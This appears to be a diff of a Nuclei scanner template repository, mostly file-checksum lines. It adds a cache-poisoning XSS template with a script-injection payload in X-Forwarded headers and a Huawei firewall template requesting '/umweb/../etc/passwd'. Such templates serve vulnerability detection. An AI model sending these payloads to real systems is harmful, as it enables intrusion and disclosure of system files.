+helpers/wordpress/plugins/wordpress-seo.txt:020ffe2e7ce5023a6eb4bf3d5fd562fa9026248c
 helpers/wordpress/plugins/worker.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
-helpers/wordpress/plugins/wp-fastest-cache.txt:270ab9fbc267c8db129c34d079aeb2a92f7b9f42
+helpers/wordpress/plugins/wp-fastest-cache.txt:1d081306e5641dc8f7dae6c01bd4b9c0b99a8996
 helpers/wordpress/plugins/wp-file-manager.txt:bd1b35ea2c8692269da8a819c39a7433032177ea
 helpers/wordpress/plugins/wp-google-maps.txt:6c75863a2a166bfaf866032133ae1ec337f07572
 helpers/wordpress/plugins/wp-mail-smtp.txt:decfe4a741808ff162a3556af7bda411d3d2454a
@ -3476,13 +3483,13 @@ helpers/wordpress/plugins/wp-sitemap-page.txt:1ae2b3145aeda5c94e1cc83b23d74521cf
 helpers/wordpress/plugins/wp-smushit.txt:5686950f2f428815c60b1d52a9d975e0c5220d0f
 helpers/wordpress/plugins/wp-statistics.txt:15effe0b5b346687811b0ff74b2b9f0a0b7b1ce6
 helpers/wordpress/plugins/wp-super-cache.txt:b600bf3dacb5d620338f6412a343d3349ec570bf
-helpers/wordpress/plugins/wp-user-avatar.txt:6c533460650b50d862404d6c608fad381eae4a95
+helpers/wordpress/plugins/wp-user-avatar.txt:9b2f4c3c25986436f50e7581b0398720d5de37be
 helpers/wordpress/plugins/wpcf7-recaptcha.txt:e864410c570d87244a122a31198944fa5ab9260e
 helpers/wordpress/plugins/wpcf7-redirect.txt:0aaa3cea7451675ff270540e13308210d8fce9ab
-helpers/wordpress/plugins/wpforms-lite.txt:9303ec7d198af9fd0d09e6325ce92fa8a37871e2
+helpers/wordpress/plugins/wpforms-lite.txt:16b6792a75509d1bfccd72bb6c0c75caa401597d
 helpers/wordpress/plugins/wps-hide-login.txt:fa12796bd5aa83d02e53616812c25306cd1d6917
-helpers/wordpress/plugins/wpvivid-backuprestore.txt:a3f17f79f3b2ec376c197f3c6632b4895ac648de
-helpers/wordpress/plugins/yith-woocommerce-compare.txt:1ecff771971af597bfee22c562d6808927a1c4de
+helpers/wordpress/plugins/wpvivid-backuprestore.txt:2e398a730d7921539849eae91b7aebc16f3b7bd3
+helpers/wordpress/plugins/yith-woocommerce-compare.txt:635f106f3d804ce532995f25a36b9bcc12d5fd50
 helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:08d2e98e6754af941484848930ccbaddfefe13d6
 iot/ampguard-wifi-setup.yaml:7986dfd87ba6c944a3e41551142be334fb467054
 iot/apc-ups-login.yaml:fbffca03320c39fedfe1c8089cdbdf8d3c9370ca
@ -3614,6 +3621,7 @@ misconfiguration/apache-drill-exposure.yaml:0027240750b516907b433a271dd4a2001bf4
 misconfiguration/apache-druid-unauth.yaml:e81e6e413515687a2fcdd48deab9f037d44da890
 misconfiguration/apache-struts-showcase.yaml:df9c20294a7f64fb82ad59e9032c3566cc107e02
 misconfiguration/apc-info.yaml:6a8b19adac71973b6adb6be84b55dfb77f902ef7
+misconfiguration/apollo-adminservice-unauth.yaml:235eb8945f702937dcdee92444be1d5d11c40a14
 misconfiguration/application-yaml.yaml:cb57a3023ac893378813e1b8e07bc3695d7e9c20
 misconfiguration/artifactory-anonymous-deploy.yaml:2044d6cb821dff9a1623cbe9fdef8cc188f9e156
 misconfiguration/aspx-debug-mode.yaml:fcb07141c210b46b376cebf92fa92eb7bddc730f
@ -3648,6 +3656,7 @@ misconfiguration/debug/ampache-debug.yaml:b1d6b9ef8a88dfa0f51a37120b069592263794
 misconfiguration/debug/bottle-debug.yaml:c776fd480a90eebb9463f876da9e1c4fdce9ce81
 misconfiguration/debug/flask-werkzeug-debug.yaml:2535f771f54941ff6d86d860e3904b436eeddf09
 misconfiguration/debug/github-debug.yaml:5a6e83aecd66b2ab5aa05bbf5dda7d975bb29519
+misconfiguration/default-spx-key.yaml:b8514c9765bf3f7d474c2b4777098051755623bf
 misconfiguration/deos-openview-admin.yaml:28b1a7638e955257e249fe00af11427b75e6de54
 misconfiguration/dgraph-dashboard-exposure.yaml:755c6e43d5b4782940cef9f861462b1aedd7e409
 misconfiguration/django-debug-detect.yaml:bfce44ee058bf5d0b5471c01008615c0f2abfce7
@ -3818,7 +3827,7 @@ misconfiguration/liferay/liferay-jsonws.yaml:c96f909c76a86071c08a1e0bb6f3c884715
 misconfiguration/linkerd-ssrf-detect.yaml:dff9e9a3bfc9067085b0377addad1b298a49e88b
 misconfiguration/linktap-gateway-exposure.yaml:c386ca04c796210bfeef3fdec958081b1a991a63
 misconfiguration/locust-exposure.yaml:94888c70e034f3a4d4921c01a2f0ed0f63eb7f40
-misconfiguration/lvm-exporter-metrics.yaml:1109a7cbd5372a2e0eabdff63fa7977dc3e3a7ad
+misconfiguration/lvm-exporter-metrics.yaml:fbecdd86e517df0d41837aeccdde643bb229bc1f
 misconfiguration/manage-engine-ad-search.yaml:4890324fc24c02e7c4b675373a7426bf9a7226c7
 misconfiguration/misconfigured-concrete5.yaml:8e31561ba766695d4e2e3b7f1509a7aaa3921ae9
 misconfiguration/misconfigured-docker.yaml:6b8bd5e24cd1571d04829f6e69a64c158635f1b6
@ -3911,7 +3920,7 @@ misconfiguration/springboot/springboot-caches.yaml:b08608a27fe3b79ea347c20adb4bb
 misconfiguration/springboot/springboot-conditions.yaml:6f7a83e37b493b4a725ffec717c4b43fd9035784
 misconfiguration/springboot/springboot-configprops.yaml:94f068ee8d27801bf29299a2c3a828641f290866
 misconfiguration/springboot/springboot-dump.yaml:6bbda125adec8121c788caca99187c2a378a6ee2
-misconfiguration/springboot/springboot-env.yaml:9e1c0912292b8e2108bde29065197b103ab78ff9
+misconfiguration/springboot/springboot-env.yaml:774ead8cdb3510bccad9d257f0b3eb62874d4f67
 misconfiguration/springboot/springboot-features.yaml:9460d13f4094606a25008d17a260c220864b5a26
 misconfiguration/springboot/springboot-flyway.yaml:69e031aad5742f178ca418ccf3e1a6e0cc6e2fcf
 misconfiguration/springboot/springboot-gateway.yaml:98b09a9984f802b644326497c084b265ead5a894
@ -4040,6 +4049,7 @@ network/detection/vnc-service-detect.yaml:bc8088d5032c6f8f659919374590a29db1c028
 network/detection/weblogic-iiop-detect.yaml:d3de22c180e47908dd08006d8cce6e374595d6da
 network/detection/weblogic-t3-detect.yaml:bf358a868c213f08f40d08ab2cc7558a278014f8
 network/detection/xlight-ftp-service-detect.yaml:b7aa1d0733d7d8b31f8359b9b7b80e1c156d7cee
+network/enumeration/beanstalk-service.yaml:802b2152b73587550fb43c9ca2c1d2366cfb05bf
 network/enumeration/kafka-topics-list.yaml:25cb56390f28320fe0392c5822ec0f02d92af836
 network/enumeration/mongodb-info-enum.yaml:fc92e9737c12e7532216e386948717438a34022f
 network/enumeration/niagara-fox-info-enum.yaml:b4cf53ad408f27bdc2f7d744b612d2b0ec49ec63
@ -4315,6 +4325,7 @@ osint/igromania.yaml:f0b2a7e563cbe258103de5df1d1e319f7a6b27a6
 osint/ilovegrowingmarijuana.yaml:0553ea4123a4df3adc57c5335cb102157f91b607
 osint/imagefap.yaml:cef75d37439a993d94593f69f015ddb637240663
 osint/imageshack.yaml:33146b5eafba2c1a33a29e73428efa751807794c
+osint/imgbb.yaml:bf6dd05571daeaa2c17d3ed62b88a4a82fac6f74
 osint/imgsrcru.yaml:bc79b93f4d1a3705681b6f0ef3cfb4a48c83bdf1
 osint/imgur.yaml:fd88a2b936e849956e8c6f34f193135d373a2772
 osint/inaturalist.yaml:3b572506651a1e0e6668d6e8d95fe11ce0719b51
@ -4523,6 +4534,7 @@ osint/riskru.yaml:1ab99a590f5eb0b27d31c7a6a89fce7c700a6ec2
 osint/roblox.yaml:d00322656dbe3996dd9c4b51817ead8651c91d12
 osint/rsi.yaml:90bc43b0652505d9147858a9f509512c1fcdff33
 osint/ru-123rf.yaml:f8dbae6c508aae854c48d026e1382dcd16885279
+osint/rubygems.yaml:ebaecb91b02aef2edf529ba279149fb5236d7c6b
 osint/rumblechannel.yaml:859d404e5045f68ca760fd6a6777287bfa01442d
 osint/rumbleuser.yaml:e038e54cfc848a14dbeb17efced85aaa82ddf5e9
 osint/salon24.yaml:a8257c5825cf842f2895e6fe2a8fc247ed6e1730
@ -5185,7 +5197,7 @@ technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:9d84f6bad7
 technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:7ea0a74a6af9aa4ac1101470972adbc3d2500202
 technologies/wordpress/plugins/google-listings-and-ads.yaml:594a204f68562a123cf57405a4d12c2e68ee873d
 technologies/wordpress/plugins/google-site-kit.yaml:e9cc2f51c3a9661d00d1d3b125960989c88230a5
-technologies/wordpress/plugins/google-sitemap-generator.yaml:39f8607fd2c1bb21c5811d06b33a57a7acbf74ec
+technologies/wordpress/plugins/google-sitemap-generator.yaml:03c2608fb1d70a6e2fa59e498f3b64b2b13ec7da
 technologies/wordpress/plugins/gtranslate.yaml:b322f13d30b8ae0dce356eb3e96a6dc5f9d95c13
 technologies/wordpress/plugins/gutenberg.yaml:b738d56aa928458fa80419030c927791f482b2b8
 technologies/wordpress/plugins/happy-elementor-addons.yaml:044b189f2dafdeb4ce0ea8d1c9289b8cdbd1a184
@ -5333,7 +5345,7 @@ technologies/zend-server-test-page.yaml:c8879fa309b8e364e8b059496bd8c6e5728e2f00
 technologies/zerof-webserver-detect.yaml:ad28fd14c295ab099f1cf3694447c835dd9e11ab
 technologies/zimbra-detect.yaml:3ccaf182c2f23e569a4a9fbf8b1ff8aa35c4cd2e
 technologies/zope-detect.yaml:11941290adac63a70ea7a18265d84e77e71a47f0
-templates-checksum.txt:9ff6bfea49ddded6435ebdce2657546198d9a117
+templates-checksum.txt:808b1fab90708b80c05a8716b38234c6c4a6b981
 token-spray/README.md:540186dfd0afcc5747b8184f29e91103adc418c4
 token-spray/api-1forge.yaml:141edbc3234c7adc6297ac433cdbdc153c3bc33d
 token-spray/api-abstract-company-enrichment.yaml:02768767b21ab8dcebe9e801a96d3b7341193d66
@ -5584,7 +5596,7 @@ vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml:c37c11b5d98661ecede64dc658a
 vulnerabilities/avaya/avaya-aura-rce.yaml:40c2c8d2c108cf16aa227f7e42ae05d5d42266d3
 vulnerabilities/avaya/avaya-aura-xss.yaml:10a75619793c76ddc508b1355b6ae76da02fc176
 vulnerabilities/backdoor/jexboss-backdoor.yaml:a0124626d80ab14c59561c9afca1871072ea3832
-vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml:ad6b799813d4683b9088cbdf5e7d541e38a39a49
+vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml:e66941b42e9a716548ba1d12ab0022537a93918e
 vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:7cf283a83b53c6a2b41a406f306df34fb36ae6d6
 vulnerabilities/cisco/cisco-vmanage-log4j.yaml:c94830d559614d58d5e99f2405061cb9121e6cc0
 vulnerabilities/cisco/cucm-username-enumeration.yaml:4c8febb4c6325ec8d18177af9a5c9105b19ef909
@ -5608,7 +5620,8 @@ vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml:f9d4ecb08bdf51e74c5d27998b1734
 vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml:888c405ab50727cd739bc54a4f636b68f3e8a539
 vulnerabilities/froxlor-xss.yaml:b7a8053428af4cd83da714a635e323d2fa0cb815
 vulnerabilities/generic/basic-xss-prober.yaml:89b909d447b5c3021286127387981c7e82866d8d
-vulnerabilities/generic/cache-poisoning.yaml:5cb427ca65a95703bda5207950c347903438dc47
+vulnerabilities/generic/cache-poisoning-xss.yaml:fa5e5e6148241f34e3955a4e2136cf3bee7f77ad
+vulnerabilities/generic/cache-poisoning.yaml:a07a7a62a4c913d87f793ca4fecbdd835c79ecfd
 vulnerabilities/generic/cors-misconfig.yaml:3c3cddefe919cd1ee7ed87c078b4ff1789f3b8c8
 vulnerabilities/generic/crlf-injection.yaml:cbd5722d86198c3ddaf9cc7452916dc573f79624
 vulnerabilities/generic/error-based-sql-injection.yaml:15320fc986ae831c71b4aeaebc12db105d89479e
@ -5631,6 +5644,7 @@ vulnerabilities/gnuboard/gnuboard5-xss.yaml:63da34b07483f087538e04ecbe7766c10234
 vulnerabilities/grafana/grafana-file-read.yaml:b29e79630d92f3872ec60c397f460e4ef8eee082
 vulnerabilities/httpbin/httpbin-open-redirect.yaml:23feb3c8158ea0b0f7eaf402bdbe8ede6c7a23e6
 vulnerabilities/httpbin/httpbin-xss.yaml:012e82d62dd08eb06ff1772b2824ee019dca28f1
+vulnerabilities/huawei/huawei-firewall-lfi.yaml:93b88a7dceedb9fffb20837e1fc92f31cfbd07c4
 vulnerabilities/huawei/huawei-hg255s-lfi.yaml:829519658dc39097d80f8fcc57acc3b21f303673
 vulnerabilities/ibm/eclipse-help-system-xss.yaml:57bc74e33ef257399f462978289bcd98e0b56749
 vulnerabilities/ibm/ibm-infoprint-lfi.yaml:9e0afe62485039b5ac9bc1e7d1c51230da9198ca
--- a/vulnerabilities/generic/cache-poisoning-xss.yaml
+++ b/vulnerabilities/generic/cache-poisoning-xss.yaml
@ -0,0 +1,36 @@
+id: cache-poisoning-xss
+
+info:
+  name: Cache Poisoning - Stored XSS
+  author: melbadry9,xelkomy,akincibor
+  severity: high
+  reference:
+    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
+    - https://portswigger.net/research/practical-web-cache-poisoning
+    - https://portswigger.net/web-security/web-cache-poisoning
+  tags: cache,generic,xss
+
+variables:
+  cache_key: "{{to_lower(rand_base(6))}}"
+  cache_header: "{{to_lower(rand_base(6))}}"
+  xss_payload: '"></script><script>alert(document.domain);</script>'
+
+requests:
+  - raw:
+      - |
+        GET /?{{cache_key}}=1 HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-Prefix: {{cache_header}}.xfp{{xss_payload}}
+        X-Forwarded-Host: {{cache_header}}.xfh{{xss_payload}}
+        X-Forwarded-For: {{cache_header}}.xff{{xss_payload}}
+
+      - |
+        GET /?{{cache_key}}=1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_2, cache_header)
+          - contains(body_2, xss_payload)
+        condition: and
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@ -1,33 +1,33 @@
 id: cache-poisoning

 info:
-  name: Cache Poisoning
+  name: Cache Poisoning Detection
  author: melbadry9,xelkomy,akincibor,dogasantos
  severity: low
  reference:
    - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
    - https://portswigger.net/research/practical-web-cache-poisoning
+    - https://portswigger.net/web-security/web-cache-poisoning
  tags: cache,generic

+variables:
+  cache_key: "{{to_lower(rand_base(6))}}"
+  cache_header: "{{to_lower(rand_base(6))}}"
+
 requests:
  - raw:
      - |
-        GET /?{{randstr}}=9 HTTP/1.1
-        X-Forwarded-Prefix: prefix.cache.interact.sh
-        X-Forwarded-Host: host.cache.interact.sh
-        X-Forwarded-For: for.cache.interact.sh
+        GET /?{{cache_key}}=9 HTTP/1.1
+        Host: {{Hostname}}
+        X-Forwarded-Prefix: {{cache_header}}.xfp
+        X-Forwarded-Host: {{cache_header}}.xfh
+        X-Forwarded-For: {{cache_header}}.xff

      - |
-        GET /?{{randstr}}=9 HTTP/1.1
+        GET /?{{cache_key}}=9 HTTP/1.1
+        Host: {{Hostname}}

-    req-condition: true
    matchers:
      - type: dsl
        dsl:
-          - 'contains(body_2, "cache.interact.sh")'
-
-    extractors:
-      - type: regex
-        part: response
-        regex:
-          - "(prefix|host|for).cache.interact.sh"
+          - 'contains(body_2, cache_header)'
--- a/vulnerabilities/huawei/huawei-firewall-lfi.yaml
+++ b/vulnerabilities/huawei/huawei-firewall-lfi.yaml
@ -0,0 +1,35 @@
+id: huawei-firewall-lfi
+
+info:
+  name: Huawei Firewall - Local File Inclusion
+  author: taielab
+  severity: high
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  metadata:
+    verified: "true"
+    shodan-query: title:"HUAWEI"
+  tags: huawei,firewall,lfi
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/umweb/../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:[x*]:0:0:"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: status
+        status:
+          - 200
 @ -1 +1 @@
 .7.27
 .7.28
 @ -1 +1 @@
 .1.3
 .1.4
 @ -1 +1 @@
 .3.4.1
 .3.5.1
 @ -1 +1 @@
 .11.2
 .11.3
 @ -1 +1 @@
 .2.0
 .2.1
 @ -1 +1 @@
 .6
 .6.2
 @ -1 +1 @@
 .1.0
 .1.1
 @ -1 +1 @@
 .0.17
 .0.18
 @ -1 +1 @@
 .22.1
 .23.3
 @ -1 +1 @@
 .14.1
 .14.2